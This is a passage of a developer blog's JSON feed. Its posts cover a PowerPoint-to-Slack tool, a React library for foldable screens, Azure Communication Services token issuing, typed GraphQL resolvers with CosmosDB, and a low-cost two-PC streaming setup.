"public-speaking" ], "description": "Solving problems no one has with tools they don't need!", "content": "Last week I was procrastinating on my talk for NDC Sydney and realised I had a lot of links that I wanted to share with people who would be watching the session, but wasn’t sure what would be the best way to do it. As a virtual event, NDC had a slack channel for the conference, so it’d just be a case of putting the links in there.\nBut I started to wonder, how could I make it a bit more interesting, and then I remembered that a couple of weeks ago I came across this tweet from Scott Hanselman\nVirtual PowerPoint Greenscreens! Change a PowerPoint Slide and Change an OBS scene *simultaneously* in 50 lines of C# https://t.co/yKyuDeJDN2 via @YouTube\n— Scott Hanselman 🌮 (@shanselman) September 14, 2020 As someone who’s been doing a bunch of stuff with OBS, I liked the idea, it’s a nifty way to change up the experience when presenting and giving the audience something different compared to your traditional picture-in-picture view.\nAnd this gave me an idea, since we can use the PowerPoint interop API to read the notes, why couldn’t we use it to push to Slack instead?\nSo, I built that. You’ll find the code on GitHub for PowerPoint to Places, along with some instructions on how to get it working.\nFeel free to give it a try, but be aware that it’s written by me, for me, so I make no claims that it’ll work for you, but if people think it’d be a useful tool, let’s make it more general purpose!\n", "id": "2020-10-19-upping-your-speaker-game-with-auto-posting-from-powerpoint" }, { "title": "Want to Learn JavaScript? We've Got a Series for You!", "url": "https://www.aaron-powell.com/posts/2020-10-13-want-to-learn-javascript-weve-got-a-series-for-you/", "date": "Tue, 13 Oct 2020 16:47:11 +1100", "tags": [ "javascript" ], "description": "Get ready to dive into all things JavaScript", "content": "Over the last few months I’ve been working with a number of the other Cloud Advocates at Microsoft to put together a video series that we’ve been wanting to do for a while now…\nIntroducing the Beginners Series to: JavaScript!\nThis is a 51 (!!) part series where we cover all the fundamentals of JavaScript, from setting up an environment to the language constructs to data types. You can read the announcement post here but what you really want to do is watch the series, so head over to YouTube and get learning!\n", "id": "2020-10-13-want-to-learn-javascript-weve-got-a-series-for-you" }, { "title": "Foldable Displays With Surface Duo and React", "url": "https://www.aaron-powell.com/posts/2020-10-08-foldable-displays-with-surface-duo-and-react/", "date": "Thu, 08 Oct 2020 10:12:28 +1000", "tags": [ "javascript", "surfaceduo", "react" ], "description": "Let's look at how we can make a foldable web experience using React for the Surface Duo", "content": "Last month Microsoft released the long awaited Surface Duo, a foldable, dual-screen mobile device.\nWhile it’s not (yet?) available in Australia, it didn’t stop me being interested in it, in particular because of what they are doing for web developers. You can read the full blog post here but the key points are:\nCSS primitives to detect the layout spanning mode CSS variables for screen and hinge dimensions A JavaScript API for getting window segments Basically, the browser sees both displays as a single viewport and it’s up to you to manage how that viewport is utilised, and in particular, how you manage the gap between them (which the browser doesn’t know about). Armed with this knowledge, I decided to have a look at how we can do responsive design and progressive enhancement for web applications, targeting a Surface Duo, using React.\nSetting up an environment As mentioned above, the Duo isn’t available outside of the US (at the time of writing), so how can we get up and running with it? With the browser dev tools of course! Here’s a blog about it all, but the way it works is the same way as any other mobile device emulation in Chrome or Edge, it’s just available*, so we can get started building an application.\n*Note: This is still classed as experimental in the browser, so you’ll need to be running Edge or Chrome Canary, and enable it from edge://flags. Read more about that here.\nOrigin Trials If you’re wanting to deploy this out to a wider set of users, but don’t want each one to configure their browser directly, you can setup an Origin Trial, which allows you to create time-boxed periods in which experimental features are enabled for your users. Check out this article on how to get started, and I’ve also added it to the demo app.\nIntroducing React-Foldable React is my happy place when it comes to JavaScript UI libraries, so I wanted to think about how I’d want to use React to progressively enhance an application, and this has lead me to create react-foldable.\nreact-foldable is a series of React components and hooks that make it easier to work with a foldable device, using the proposed standards mentioned above.\nCreating a foldable layout My first goal is to look at how we can target the different displays with content, and react to the change, meaning that if we’re in a single display mode and “unfold” into dual-display, we want the ability to bring in more content.\nWe’ll start by creating a foldable zone in our application. This basically says that we’re going to be observing changes to the foldabilty of the device and reacting accordingly.\n1 2 3 4 import React from "react"; import { Foldable } from "react-foldable"; const App = () => <Foldable>{/* TODO: Components */}</Foldable>; Inside the <Foldable> component we specify <FoldableScreen>’s, which are added/removed from the component tree.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 import React from "react"; import "./App.css"; import { Foldable, FoldableScreen } from "react-foldable"; import { MainApp } from "./MainApp"; import { SecondScreen } from "./SecondScreen"; function App() { return ( <Foldable> <FoldableScreen matchScreen={0} component={MainApp} /> <FoldableScreen matchScreen={1} component={SecondScreen} /> </Foldable> ); } export default App; Each <FoldableScreen> needs to be told which screen to match. Non-foldable devices will always have a 0 screen, so that is where you’d put the things you always want displayed. There’s no restriction on the number of components you can have matching a screen either, as <FoldableScreen> acts like a wrapper component to determine whether or not it displays.\nAdvanced matching Matching on a screen is good for a lot of common scenarios, but what if you’re wanting to conditionally show a component if the device supports dual screen or not? For this, we’d use the match prop, like so:\n1 2 3 4 5 6 <Foldable> <FoldableScreen match={({ isDualScreen }) => isDualScreen} component={() => <p>I'm only appearing when we can dual-screen</p>} /> </Foldable> The match prop takes a function with the signature (props: FoldableContextProps) => boolean, where FoldableContextProps is defined like so:\n1 2 3 4 5 interface FoldableContextProps { windowSegments?: DOMRect[]; isDualScreen: boolean; screenSpanning: ScreenSpanning; } Using this, we can completely remove a component if it’s in dual screen mode, allowing you to swap out large chunks of the component hierarchy.\nUsing hooks While swapping components can work in many cases, sometimes you’ll want to programmatically detect the foldable information, and to make this easier there are a series of hooks. In fact, the hook values are all exposed through the FoldableContextProps type on the match as well, so the component dogfoods itself!\nuseDualScreen - a boolean to indicate whether or not the device is in dual-screen mode useScreenSpanning - indicates whether the screen is horizontal, vertical or unknown (unknown is primarily when it’s not a foldable device) useWindowSegments - returns an array of DOMRect that shows the bounding dimensions for each screen (non-foldable devices will return an array of one) useFoldableContext - easy access to the React context containing all of the above values Conclusion This was a quick introduction to react-foldable, a library that I’ve been building to hopefully make it easier to create progressively enhanced applications for foldable devices using React.\nYou’ll find a demo of the component at https://react-foldable.aaron-powell.com/.\nI’m very much open to feedback on how the component works and the general design, as right now it’s very much how I would tackle the problem, but if there’s aspects to prove on do reach out.\n", "id": "2020-10-08-foldable-displays-with-surface-duo-and-react" }, { "title": "Building a Video Chat App, Part 1 - Setup", "url": "https://www.aaron-powell.com/posts/2020-10-06-building-a-video-chat-app-part-1-setup/", "date": "Tue, 06 Oct 2020 09:18:43 +1000", "tags": [ "javascript", "azure" ], "description": "Let's get started with building our video chat app", "content": "Last week I kicked off a new stream series in which we’re going to take a look at Azure Communication Services (ACS).\nWell, the first episode is out and I wanted to document what we learnt with building on ACS.\nSetting the scene ACS is essentially the backend for Teams, but provided in a way that you can integrate it into your existing applications. For our case, we’re building from scratch and the target deployment is going to be Azure Static Web Apps (SWA) as this will give us an API backend (for user management), a host for our React front end and most importantly, account management.\nFor the codebase, we’re starting with a React TypeScript GitHub template that I’ve created for SWA, with the API backend written in TypeScript Azure Functions.\nGiving users access One thing that is really awesome about ACS is that you bring your own authentication model, meaning that you aren’t being forced to port your application to Azure AD or anything, but it does raise the question, how do you grant the user access?\nWell, this is where the API backend that we’re using in SWA comes into play, you need a token service that will issue tokens for the users, however your representing them. Let’s take a look at how to do that.\nCreating a token service We’ll use a HTTP Trigger to do this, and it’ll live at /api/issueToken. Start by creating that within the api folder of the Git repo:\n1 func new --template HttpTrigger --name issueToken In our Function, the first thing that we’ll do is the ensure that there is a logged in user. SWA provides a mechanism to do that via its config file, but we also want to get access to the user profile and validate it (we won’t use the profile yet, but in the future we will).\nTime to remove the boilerplate Function code and start putting in ours:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; type ClientPrincipal = { identityProvider: string; userId: string; userDetails: string; userRoles: string[]; }; const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { const header = req.headers["x-ms-client-principal"]; const encoded = Buffer.from(header, "base64"); const decoded = encoded.toString("ascii"); const principal: ClientPrincipal = JSON.parse(decoded); if (!principal.userId) { context.res = { status: 401, body: "The user name is required to ensure their access token" }; return; } context.res = { body: "TODO" }; }; export default httpTrigger; Here we’re unpacking the header and ensuring that there is a userId in the principal, if not, then we’ll return bad request.\nNow we’re going to integrate the the ACS administration npm package, @azure/communication-administration which gives us the ability to issue a token for the user. This token is then used in the client application to connect with ACS and do whatever we’re allowing the client to do.\n1 npm install --save @azure/communication-administration With the package installed, we can incorporate it in and issue our token. To do that we need to create a CommunicationIdentityClient, in which we provide the connection string to ACS.\nIf you haven’t created an ACS resource yet, check out the docs.\n1 2 3 4 5 6 7 8 import { AzureFunction, Context, HttpRequest } from "@azure/functions"; import { CommunicationIdentityClient } from "@azure/communication-administration"; const identityClient = new CommunicationIdentityClient( process.env["COMMUNICATION_SERVICES_CONNECTION_STRING"] ); // snip I’ve added a connection string to the local.settings.json, as per Azure Functions docs called COMMUNICATION_SERVICES_CONNECTION_STRING that gives me access to ACS.\nOnce the identityClient is ready, we can use it within the Function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 // snip const httpTrigger: AzureFunction = async function( context: Context, req: HttpRequest ): Promise<void> { const header = req.headers["x-ms-client-principal"]; const encoded = Buffer.from(header, "base64"); const decoded = encoded.toString("ascii"); const principal: ClientPrincipal = JSON.parse(decoded); if (!principal.userId) { context.res = { status: 401, body: "The user name is required to ensure their access token" }; return; } const user = await identityClient.createUser(); const tokenResponse = await identityClient.issueToken(user, ["voip"]); context.res = { // status: 200, /* Defaults to 200 */ body: { token: tokenResponse.token, expiresOn: tokenResponse.expiresOn, communicationUserId: user.communicationUserId } as TokenResponse }; }; export default httpTrigger; The important lines from above are these two lines:\n1 2 const user = await identityClient.createUser(); const tokenResponse = await identityClient.issueToken(user, ["voip"]); The first is creating a user in ACS. Notice how this user doesn’t have any direct relationship to the user account we’ve got in our system already. This does mean that we’re creating a whole new user each time that we want a token, rather than associating the ACS user with our systems user, so down the track we’re going to need to work out how to do that more effectively, but this is ok for the moment. Once we have our CommunicationUser we then call the issueToken method, and provide it with the scopes that we want the user to have, in this case the token will only allow them to have VOIP capabilities, but if you wanted them to have chat as well, then you’d need to explicitly grant them that.\nBut with that, our backend is done and we’re able to issue tokens for the client application.\nConclusion This isn’t everything that we managed to get to in the first episode, but it is the most important thing because once we can issue tokens we can start to build up the client application. You’ll find the code in the part-01 tag on GitHub, and you can watch the whole episode on YouTube. Nex time, we’re going to start displaying camera feeds and accessing the microphone.\n", "id": "2020-10-06-building-a-video-chat-app-part-1-setup" }, { "title": "New Stream Series: Building a Video Calling App", "url": "https://www.aaron-powell.com/posts/2020-09-29-new-stream-series-building-a-video-calling-app/", "date": "Tue, 29 Sep 2020 11:43:39 +1000", "tags": [ "javascript", "azure" ], "description": "Let's check out a new Azure service and build a video calling app", "content": "Last week at Microsoft Ignite there was a new service announced, Azure Communication Services (ACS).\nACS is, essentially, the Teams backend for video, chat, telephone and SMS, but as a service you can integrate into your own applications.\nSo I decided that I wanted to check it out and as such I’m going to be doing a weekly stream where we look to build an app using ACS and also look at how we can integrate ACS with other parts of Azure (I’m particularly interested to play with Cognitive Services and ACS).\nFor this series though, I’m not going to stream primarily on my Twitch channel, but on the Microsoft Developer Twitch channel, as well as our LearnTV platform. The videos will also be available on my YouTube channel.\nWe’ll be kicking off at 2pm AEST, Wednesday 30th September (which is 9pm the previous day in PST).\nSee you on the stream!\n", "id": "2020-09-29-new-stream-series-building-a-video-calling-app" }, { "title": "GraphQL on Azure: Part 5 - Can We Make GraphQL Type Safe in Code", "url": "https://www.aaron-powell.com/posts/2020-09-17-graphql-on-azure-part-5-can-we-make-graphql-type-safe-in-code/", "date": "Thu, 17 Sep 2020 15:21:02 +1000", "tags": [ "azure", "serverless", "azure-functions", "javascript", "graphql" ], "description": "We're defining a GraphQL schema with a type system, but can we use that type system for our application?", "content": "I’ve been doing a lot of work recently with GraphQL on Azure Functions and something that I find works nicely is the schema-first approach to designing the GraphQL endpoint.\nThe major drawback I’ve found though is that you start with a strongly typed schema but lose that type information when implementing the resolvers and working with your data model.\nSo let’s have a look at how we can tackle that by building an application with GraphQL on Azure Functions and backing it with a data model in CosmosDB, all written in TypeScript.\nTo learn how to get started with GraphQL on Azure Functions, check out the earlier posts in this series.\nCreating our schema The API we’re going to build today is a trivia API (which uses data from Open Trivia DB as the source).\nWe’ll start by defining a schema that’ll represent the API as a file named schema.graphql within the graphql folder:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 type Question { id: ID! question: String! correctAnswer: String! answers: [String!]! } type Query { question(id: ID!): Question getRandomQuestion: Question } type Answer { questionId: ID question: String! submittedAnswer: String! correctAnswer: String! correct: Boolean } type Mutation { answerQuestion(id: ID, answer: String): Answer } schema { query: Query mutation: Mutation } Our schema has defined two core types, Question and Answer, along with a few queries and a mutation and all these types are decorated with useful GraphQL type annotations, that would be useful to have respected in our TypeScript implementation of the resolvers.\nCreating a resolver Let’s start with the query resolvers, this will need to get back the data from CosmosDB to return the our consumer:\n1 2 3 4 5 6 7 8 9 10 11 12 13 const resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } } }; export default resolvers; This matches the query portion of our schema from the structure, but how did we know how to implement the resolver functions? What arguments do we get to question and getRandomQuestion? We know that question will receive an id parameter, but how? If we look at this in TypeScript there’s any all over the place, and that’s means we’re not getting much value from TypeScript.\nHere’s where we start having a disconnect between the code we’re writing, and the schema we’re working against.\nEnter GraphQL Code Generator Thankfully, there’s a tool out there that can help solve this for us, GraphQL Code Generator. Let’s set it up by installing the tool:\n1 npm install --save-dev @graphql-codegen/cli And we’ll setup a config file named config.yml in the root of our Functions app:\n1 2 3 4 5 6 7 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: plugins: - typescript - typescript-resolvers This will generate a file named generated.ts within the graphql folder using our schema.graphql as the input. The output will be TypeScript and we’re also going to generate the resolver signatures using the typescript and typescript-resolvers plugins, so we best install those too:\n1 npm install --save-dev @graphql-codegen/typescript @graphql-codegen/typescript-resolvers It’s time to run the generator:\n1 npx graphql-codegen --config codegen.yml Strongly typing our resolvers We can update our resolvers to use this new type information:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 import { Resolvers } from "./generated"; const resolvers: Resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } } }; export default resolvers; Now we can hover over something like id and see that it’s typed as a string, but we’re still missing a piece, what is dataStore and how do we know what type to make it?\nCreating a data store Start by creating a new file named data.ts. This will house our API to work with CosmosDB, and since we’re using CosmosDB we’ll need to import the node module:\n1 npm install --save @azure/cosmos Why CosmosDB? CosmosDB have just launched a serverless plan which works nicely with the idea of a serverless GraphQL host in Azure Functions. Serverless host with a serverless data store, sound like a win all around!\nWith the module installed we can implement our data store:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 import { CosmosClient } from "@azure/cosmos"; export type QuestionModel = { id: string; question: string; category: string; incorrect_answers: string[]; correct_answer: string; type: string; difficulty: "easy" | "medium" | "hard"; }; interface DataStore { getQuestionById(id: string): Promise<QuestionModel>; getQuestions(): Promise<QuestionModel[]>; } class CosmosDataStore implements DataStore { #client: CosmosClient; #databaseName = "trivia"; #containerName = "questions"; #getContainer = () => { return this.#client .database(this.#databaseName) .container(this.#containerName); }; constructor(client: CosmosClient) { this.#client = client; } async getQuestionById(id: string) { const container = this.#getContainer(); const question = await container.items .query<QuestionModel>({ query: "SELECT * FROM c WHERE c.id = @id", parameters: [{ name: "@id", value: id }], }) .fetchAll(); return question.resources[0]; } async getQuestions() { const container = this.#getContainer(); const question = await container.items .query<QuestionModel>({ query: "SELECT * FROM c", }) .fetchAll(); return question.resources; } } export const dataStore = new CosmosDataStore( new CosmosClient(process.env.CosmosDB) ); This class will receive a CosmosClient that gives us the connection to query CosmosDB and provides the two functions that we used in the resolver. We’ve also got a data model, QuestionModel that represents how we’re storing the data in CosmosDB.\nTo create a CosmosDB resource in Azure, check out their quickstart and here is a data sample that can be uploaded via the Data Explorer in the Azure Portal._\nTo make this available to our resolvers, we’ll add it to the GraphQL context by extending index.ts:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 import { ApolloServer } from "apollo-server-azure-functions"; import { importSchema } from "graphql-import"; import resolvers from "./resolvers"; import { dataStore } from "./data"; const server = new ApolloServer({ typeDefs: importSchema("./graphql/schema.graphql"), resolvers, context: { dataStore } }); export default server.createHandler(); If we run the server, we’ll be able to query the endpoint and have it pull data from CosmosDB but our resolver is still lacking a type for dataStore, and to do that we’ll use a custom mapper.\nCustom context types So far, the types we’re generating are all based off what’s in our GraphQL schema, and that works mostly but there are gaps. One of those gaps is how we use the request context in a resolver, since this doesn’t exist as far as the schema is concerned we need to do something more for the type generator.\nLet’s define the context type first by adding this to the bottom of data.ts:\n1 2 3 export type Context = { dataStore: DataStore; }; Now we can tell GraphQL Code Generator to use this by modifying our config:\n1 2 3 4 5 6 7 8 9 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: config: contextType: "./data#Context" plugins: - "typescript" - "typescript-resolvers" We added a new config node in which we specify the contextType in the form of <path>#<type name> and when we run the generator the type is used and now the dataStore is typed in our resolvers!\nCustom models It’s time to run our Function locally.\n1 npm start And let’s query it. We’ll grab a random question:\n1 2 3 4 5 6 7 { getRandomQuestion { id question answers } } Unfortunately, this fails with the following error:\nCannot return null for non-nullable field Question.answers.\nIf we refer back to our Question type in the GraphQL schema:\n1 2 3 4 5 6 type Question { id: ID! question: String! correctAnswer: String! answers: [String!]! } This error message makes sense as answers is a non-nullable array of non-nullable strings ([String!]!), but if that’s compared to our data model in Cosmos:\n1 2 3 4 5 6 7 8 9 export type QuestionModel = { id: string; question: string; category: string; incorrect_answers: string[]; correct_answer: string; type: string; difficulty: "easy" | "medium" | "hard"; }; Well, there’s no answers field, we only have incorrect_answers and correct_answer.\nIt’s time to extend our generated types a bit further using custom models. We’ll start by updating the config file:\n1 2 3 4 5 6 7 8 9 10 11 overwrite: true schema: "./graphql/schema.graphql" generates: graphql/generated.ts: config: contextType: "./data#Context" mappers: Question: ./data#QuestionModel plugins: - "typescript" - "typescript-resolvers" With the mappers section, we’re telling the generator when you find the Question type in the schema, it’s use QuestionModel as the parent type.\nBut this still doesn’t tell GraphQL how to create the answers field, for that we’ll need to define a resolver on the Question type:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 import { Resolvers } from "./generated"; const resolvers: Resolvers = { Query: { question(_, { id }, { dataStore }) { return dataStore.getQuestionById(id); }, async getRandomQuestion(_, __, { dataStore }) { const questions = await dataStore.getQuestions(); return questions[Math.floor(Math.random() * questions.length) + 1]; } }, Question: { answers(question) { return question.incorrect_answers .concat([question.correct_answer]) .sort(); }, correctAnswer(question) { return question.correct_answer; } } }; export default resolvers; These field resolvers will receive a parent as their first argument that is the QuestionModel and expect to return the type as defined in the schema, making it possible to do mapping of data between types as required.\nIf you restart your Azure Functions and execute the query from before, a random question is returned from the API.\nConclusion We’ve taken a look at how we can build on the idea of deploying GraphQL on Azure Functions and looked at how we can use the GraphQL schema, combined with our own models, to enforce type safety with TypeScript.\nWe didn’t implement the mutation in this post, that’s an exercise for you as the reader to tackle.\nYou can check out the full example, including how to connect it with a React front end, on GitHub.\nThis article is part of #ServerlessSeptember (https://aka.ms/ServerlessSeptember2020). You’ll find other helpful articles, detailed tutorials, and videos in this all-things-Serverless content collection. New articles from community members and cloud advocates are published every week from Monday to Thursday through September.\nFind out more about how Microsoft Azure enables your Serverless functions at https://docs.microsoft.com/azure/azure-functions/\n", "id": "2020-09-17-graphql-on-azure-part-5-can-we-make-graphql-type-safe-in-code" }, { "title": "Two PC Streaming for Minimal Cost", "url": "https://www.aaron-powell.com/posts/2020-09-08-two-pc-streaming-for-minimal-cost/", "date": "Tue, 08 Sep 2020 15:08:09 +1000", "tags": [ "streaming", "public-speaking" ], "description": "Can you make a two PC stream setup without spending much money?", "content": "Like many people, I’ve started streaming on Twitch, and like many people, I might not have really thought about what I was getting myself into when I started doing it.\nMy main machine is a Surface Book 2 i7 with 16GB of memory, which is more than adequate for day-to-day work but this doesn’t mean that it’s the right thing to try and run a streaming setup. As soon as I fire up OBS and have a few apps running, things start grinding to a halt. You can see this on a few of my early streams, some operations that should take seconds, started taking minutes (like opening a browser tab). This results in a sub-optimal experience as a content creator and as a viewer, so I decided to try and solve it.\nBut there’s a catch, I don’t have a huge pile of money sitting around for me to drop on building a super powerful streaming PC, so I needed to think about how to do this as cheaply as possible, which is what I want to talk through today.\nWhy use a streaming PC Before we get started in the how, it’s a good idea to talk about the why, why would you need a streaming PC?\nTo stream, or even to do offline video production, you need to run some software which is generally going to be resource intensive on the machine. Whether it’s OBS, Camtasia, Adobe Premiere or anything like that, you’re going to be running software that is doing video encoding, and that will be either CPU or GPU bound. With a desktop, this is less of a problem, you’ll have a dedicated GPU, but in a laptop you either don’t have a dedicated GPU or the dedicated GPU isn’t the most powerful thing available.\nThis is the case with the Surface Book 2. It’s got a dedicated GPU, and it’s ok, but not great, so the more the system is loaded up with resource demands, the less available resources there are for the software you’re wanting to record.\nEnter a streaming PC. The idea here is that you offload the production side of your content creation to a separate machine and by doing so, freeing up resources on your primary machine.\nHaving a dedicated streaming PC does complicate things though, as you now need to work out how you’re going to get whatever it is you’re displaying on your main machine across to the streaming PC, plus your mic and camera feeds, and this is where things start getting expensive though the use of capture cards, XLR mics, etc.\nSo let’s look at doing it cheaply.\nThe streaming PC I’m a technology hoarder, I don’t get rid of devices when they’ve outlived their usefulness and this means that I have a stack of old laptops around. I’ve got 2x Surface Pro 4 on my desk (as well as 2x Surface 3, a Lenovo Helix, Sony Vaio, Macbook Pro (circa 2008), Surface Pro 1, 2x Surface RT 2 and a desktop (which hasn’t worked for ~6 years) scattered around the house) and I figured that the Pro 4 should be a viable enough device for some basic video production like I need. After all, I had used it in the past to do video production, but it was much more simplistic production that I’m trying to do today.\nSide note, I do have 2x Pi 3 on my desk as well, and it did cross my mind to use that, but I decided against it, they are a bit too underpowered.\nSo an old laptop is a decent enough option when it comes to creating a streaming PC, it doesn’t matter if you’re running 80% CPU while streaming with the fans sounding like an aircraft about to take off, it’s only job is to run the stream and if the fans are too noisy, well it doesn’t need to be on your desk, pop it on the floor.\nStreaming to a streaming PC Finding an old laptop that can run OBS (or any video creation software) is the easy part, now comes the confusing one, how do you get your screen from your main device to your streaming PC?\nWell, the basic idea is that you need to turn an external monitor into an input that can be received by your streaming PC and for this we’d use a capture card.\nIf you’ve started to look at making a streaming PC, chances are you’ve looked at something like the Elgato HD60. Cards like this were popularised as a way to get the feed from a console into a PC to do post-production on, but the principal is the same for a PC to PC streaming, it takes a HDMI in and turns it into an available source (often represented as a camera) that you can use within your production software.\nBut that requires a proper PC (not to mention expensive), and we’re repurposing an old laptop, so we need to think a bit more creatively.\nEnter the HDMI to USB converter.\nThis little device takes a HDMI input and then converts it into a USB feed which can then be plugged into a USB port on my laptop. It’s commonly used to capture the output of a DSLR or other professional camera and then feed it into a computer, but HDMI is HDMI, so there’s no reason that we can’t feed our main device in.\nElgato has one of these, it’s called Cam Link 4K and it’s hard to find availability of, plus it’s a few hundred dollars, so it’s not ideal for being overly price sensitive. But over the last few months there has been a flood on the market of really cheap HDMI to USB devices, and I picked up this one for around $40AUD delivered.\nSure, the quality isn’t as high as you’ll get out of a more expensive device, but it’s fit for purpose and at a viable price point that you can work to overcome the quality loss between your main device and streaming device. Would I game with it? No, but showing VS Code and a reasonably unchanging screen, it works well enough.\nMonitors everywhere So we’ve got a device that will take a HDMI input and make it available via USB for our streaming PC, but how do we do that? As soon as you plug in your HDMI cable Windows will detect it as an external monitor and you can now push to it, but that might not be idea because that monitor doesn’t really exist does it? At best, you could look at your streaming PC on the desk next to you, but if you’ve put that laptop on the floor, well now it’s really hard to look at!\nHere we can exploit how Windows multi-display setup works. Now normally you’d have a multi-monitor setup in extended mode so each screen is independent, but that’s no good for our capture device, instead we can extend to one and duplicate the other (assuming you’re already running an external screen).\nThis is my layout, I have a stacked monitor setup with my laptop on the desk and 32" external above it. Within Windows display settings you can select a monitor and under the Multiple Displays choose to duplicate an external monitor to another external, which is just what I did, monitors 2 (my 32") and 3 (my HDMI to USB) are the same thing.\nThis does mean I have to drop the resolution down to 1920x1080, which is what the HDMI to USB accepts, but that’s fine as I’m not going to stream at a higher resolution that that to Twitch anyway.\nNow whatever I do on my external monitor is being pushed over to my streaming PC, ready to be pumped out to the world on Twitch!\nHear me, see me We’re setup to stream our screen but that’s only part of the puzzle, you probably want people to be able to see your camera feed and hear you on your mic. We need to make these available to our streaming PC, but we probably also want them on our main device for the endless hours of video calls we’re all doing now, and you don’t want to be fumbling to rewire your USB setup every time someone calls you up to pair program do you?\nDon’t worry though, there’s a solution for that, a USB switch! I picked this one up for about $50AUD delivered and it allows me to plug in 4 devices and switch them easily between my two laptops.\nSo now I have my webcam, mic and stream deck all plugged into the switch, which is then plugged into my Surface Dock (for my Book 2) and then directly into my Pro 4 and with a press of a button I can swap which machine they are connected to.\nQuick aside, I also connect my HDMI to USB through the switch too, but that’s because my Pro 4 has only a single USB input, but if you have multiple USB inputs then use them as I’m pretty much maxing out the USB bus!\nConclusion This is my streaming setup (well normally the laptop lid is up, but that’d hide the cables in the photo), my Surface Book 2 connects to a Surface Dock, which connects an external display + HDMI to USB converter, that feeds the 3rd monitor stream into a USB switch that my camera, mic and stream deck are connected to and allows me to switch between which device they are available for. I then have a repurposed Surface Pro 4 that takes these 4 USB devices in via a single USB input, runs OBS and sends the stream up to Twitch or records locally (depending on my needs).\nAll in all, I spent a little under $100AUD to set this up. I already had the old laptop to use, so being able to improve the quality of my stream for that little money does seem like money well spent and hopefully it shows you how you too can improve the quality of your stream without breaking the bank.\nAnd do you want to see how it turns out? Drop by my stream each Friday lunch time.\n", "id": "2020-09-08-two-pc-streaming-for-minimal-cost" }, { "title": "GraphQL on Azure: Part 4 - Serverless CosmosDB", "url": "https://www.aaron-powell.com/posts/2020-09-04-graphql-on-azure-part-4-serverless-comsosdb/", "date": "Fri, 04 Sep 2020 11:04:32 +1000", "tags": [ "azure", "serverless", "azure-functions", "dotnet", "graphql" ], "description": "Let's take a look at how to integrate a data source with GraphQL on Azure", "content": "A few months ago I wrote a post on how to use GraphQL with CosmosDB from Azure Functions, so this post might feel like a bit of a rehash of it, with the main difference being that I want to look at it from the perspective of doing .NET integration between the two.\nThe reason I wanted to tackle .NET GraphQL with Azure Functions is that it provides a unique opportunity, being able to leverage Function bindings. If you’re new to Azure Functions, bindings are a way to have the Functions runtime provide you with a connection to another service in a read, write or read/write mode. This could be useful in the scenario of a function being triggered by a file being uploaded to storage and then writing some metadata to a queue. But for todays scenario, we’re going to use a HTTP triggered function, our GraphQL endpoint, and then work with a database, CosmosDB.\nWhy CosmosDB? Well I thought it might be timely given they have just launched a consumption plan which works nicely with the idea of a serverless GraphQL host in Azure Functions.\nWhile we have looked at using .NET for GraphQL previously in the series, for this post we’re going to use a different GraphQL .NET framework, Hot Chocolate, so there’s going to be some slightly different types to our previous demo, but it’s all in the name of exploring different options.\nGetting Started At the time of writing, Hot Chocolate doesn’t officially support Azure Functions as the host, but there is a proof of concept from a contributor that we’ll use as our starting point, so start by creating a new Functions project:\n1 func init dotnet-graphql-cosmosdb --dotnet Next, we’ll add the NuGet packages that we’re going to require for the project:\n1 2 3 4 5 <PackageReference Include="Microsoft.Azure.Functions.Extensions" Version="1.0.0" /> <PackageReference Include="Microsoft.NET.Sdk.Functions" Version="3.0.3" /> <PackageReference Include="HotChocolate" Version="10.5.2" /> <PackageReference Include="HotChocolate.AspNetCore" Version="10.5.2" /> <PackageReference Include="Microsoft.Azure.WebJobs.Extensions.CosmosDB" Version="3.0.7" /> These versions are all the latest at the time of writing, but you may want to check out new versions of the packages if they are available.\nAnd the last bit of getting started work is to bring in the proof of concept, so grab all the files from the GitHub repo and put them into a new folder under your project called FunctionsMiddleware.\nMaking a GraphQL Function With the skeleton ready, it’s time to make a GraphQL endpoint in our Functions project, and to do that we’ll scaffold up a HTTP Trigger function:\n1 func new --name GraphQL --template "HTTP trigger" This will create a generic function for us and we’ll configure it to use the GraphQL endpoint, again we’ll use a snippet from the proof of concept:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 using System.Threading; using System.Threading.Tasks; using Microsoft.AspNetCore.Mvc; using Microsoft.Azure.WebJobs; using Microsoft.Azure.WebJobs.Extensions.Http; using Microsoft.AspNetCore.Http; using Microsoft.Extensions.Logging; using HotChocolate.AspNetCore; namespace DotNet.GraphQL.CosmosDB { public class GraphQL { private readonly IGraphQLFunctions _graphQLFunctions; public GraphQL(IGraphQLFunctions graphQLFunctions) { _graphQLFunctions = graphQLFunctions; } [FunctionName("graphql")] public async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Anonymous, "get", "post", Route = null)] HttpRequest req, ILogger log, CancellationToken cancellationToken) { return await _graphQLFunctions.ExecuteFunctionsQueryAsync( req.HttpContext, cancellationToken); } } } Something you might notice about this function is that it’s no longer a static, it has a constructor, and that constructor has an argument. To make this work we’re going to need to configure dependency injection for Functions.\nAdding Dependency Injection Let’s start by creating a new class to our project called 